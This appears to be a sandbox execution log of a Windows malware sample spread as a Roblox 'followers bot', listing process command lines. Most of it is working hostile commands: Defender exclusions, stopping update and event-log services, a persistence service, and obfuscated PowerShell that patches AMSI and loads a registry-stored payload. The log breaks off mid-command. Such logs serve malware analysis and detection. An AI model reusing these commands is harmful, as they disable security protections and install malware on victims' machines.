C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://bit.ly/followersbot_rblx

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x124,0x134,0x7ff9a64a46f8,0x7ff9a64a4708,0x7ff9a64a4718

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5064 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2fc 0x320

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x27c,0x280,0x284,0x120,0x288,0x7ff645495460,0x7ff645495470,0x7ff645495480

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4968 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6736 /prefetch:8

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\followersbot\" -ad -an -ai#7zMap30093:86:7zEvent16032

C:\Windows\System32\smartscreen.exe

C:\Windows\System32\smartscreen.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\followersbot\FOLLOWERBOTSTART.bat" "

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Downloads\followersbot\9SHCODL.exe

"C:\Users\Admin\Downloads\followersbot\\9SHCODL.exe"

C:\Users\Admin\Downloads\followersbot\9SHCODL.exe

"C:\Users\Admin\Downloads\followersbot\9SHCODL.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "HIUOFKBL"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "HIUOFKBL" binpath= "C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "HIUOFKBL"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:QhImxjyKWUtT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hVgsrERefJVIGM,[Parameter(Position=1)][Type]$PtfHVZUDZd)$rcUIbefiASF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'flec'+'t'+''+'e'+'d'+'D'+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+'s'+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+'l'+[Char](101)+''+'d'+''+[Char](44)+'A'+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$rcUIbefiASF.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+'c'+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+'P'+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$hVgsrERefJVIGM).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$rcUIbefiASF.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+'bl'+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'N'+'e'+''+[Char](119)+'Slo'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$PtfHVZUDZd,$hVgsrERefJVIGM).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $rcUIbefiASF.CreateType();}$haMKgsdSFTRfD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+''+'e'+'t'+'h'+''+[Char](111)+'d'+[Char](115)+'');$miJwkyurBBmZzv=$haMKgsdSFTRfD.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+'t'+''+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MCEMcUxEndYtGJnfutR=QhImxjyKWUtT @([String])([IntPtr]);$WWvOXsWMgytOsqhnblTFBk=QhImxjyKWUtT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JNnwUqbiAGV=$haMKgsdSFTRfD.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+'H'+''+[Char](97)+''+[Char](110)+'dle').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$MpDQEUBzVmeZsX=$miJwkyurBBmZzv.Invoke($Null,@([Object]$JNnwUqbiAGV,[Object](''+[Char](76)+'oa'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$WisoKjmviHUuuPssW=$miJwkyurBBmZzv.Invoke($Null,@([Object]$JNnwUqbiAGV,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$NylEZcZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MpDQEUBzVmeZsX,$MCEMcUxEndYtGJnfutR).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$bZcmgaFQgxxEqstMP=$miJwkyurBBmZzv.Invoke($Null,@([Object]$NylEZcZ,[Object](''+'A'+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$stXJLHeppg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WisoKjmviHUuuPssW,$WWvOXsWMgytOsqhnblTFBk).Invoke($bZcmgaFQgxxEqstMP,[uint32]8,4,[ref]$stXJLHeppg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bZcmgaFQgxxEqstMP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WisoKjmviHUuuPssW,$WWvOXsWMgytOsqhnblTFBk).Invoke($bZcmgaFQgxxEqstMP,[uint32]8,0x20,[ref]$stXJLHeppg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+'l'+'e'+''+[Char](114)+'s'+[Char](116)+''+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe

C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:erecUyBKkUxD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cgvWXsDCHZbLGT,[Parameter(Position=1)][Type]$bXKWGCdfKN)$ChuGcCDErKR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'fl'+'e'+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+'mor'+[Char](121)+'M'+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+''+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+'li'+'c'+''+[Char](44)+'S'+[Char](101)+'a'+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+''+'s'+''+'i'+''+'C'+'la'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+'a'+'s'+'s'+'',[MulticastDelegate]);$ChuGcCDErKR.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+'Na'+[Char](109)+'e'+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+','+'P'+''+[Char](117)+'bli'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cgvWXsDCHZbLGT).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ChuGcCDErKR.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+'S'+[Char](105)+'g,'+'N'+'ew'+'S'+''+[Char](108)+'ot'+','+'V'+'i'+'r'+'t'+''+'u'+''+[Char](97)+'l',$bXKWGCdfKN,$cgvWXsDCHZbLGT).SetImplementationFlags('R'+'u'+'n'+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $ChuGcCDErKR.CreateType();}$ZrqQNGUtvCJil=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+'t'+'e'+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType('M'+'i'+''+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+'sa'+'f'+'e'+'N'+'a'+[Char](116)+''+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$UyIwMnRWFMetix=$ZrqQNGUtvCJil.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+'dr'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+'atic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TPRIERKWTPoyHazJIDh=erecUyBKkUxD @([String])([IntPtr]);$zTGJYCarGFeLJUMHYnbjGP=erecUyBKkUxD @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OPuhQtqlaYd=$ZrqQNGUtvCJil.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+'l'+'e'+''+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'ne'+'l'+''+[Char](51)+''+'2'+'.'+'d'+''+'l'+'l')));$XEcoJPRbXlTNgs=$UyIwMnRWFMetix.Invoke($Null,@([Object]$OPuhQtqlaYd,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$kqwYXhPMqdADFvAjN=$UyIwMnRWFMetix.Invoke($Null,@([Object]$OPuhQtqlaYd,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l'+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$TLCpCfA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XEcoJPRbXlTNgs,$TPRIERKWTPoyHazJIDh).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+'l');$PMQjRqMgBzukPdxFW=$UyIwMnRWFMetix.Invoke($Null,@([Object]$TLCpCfA,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+''+'f'+'e'+[Char](114)+'')));$lhgbXNAFkV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kqwYXhPMqdADFvAjN,$zTGJYCarGFeLJUMHYnbjGP).Invoke($PMQjRqMgBzukPdxFW,[uint32]8,4,[ref]$lhgbXNAFkV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PMQjRqMgBzukPdxFW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kqwYXhPMqdADFvAjN,$zTGJYCarGFeLJUMHYnbjGP).Invoke($PMQjRqMgBzukPdxFW,[uint32]8,0x20,[ref]$lhgbXNAFkV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+[Char](97)+'l'+[Char](101)+'r'+'s'+''+[Char](116)+''+'a'+''+'g'+''+'e'+''+[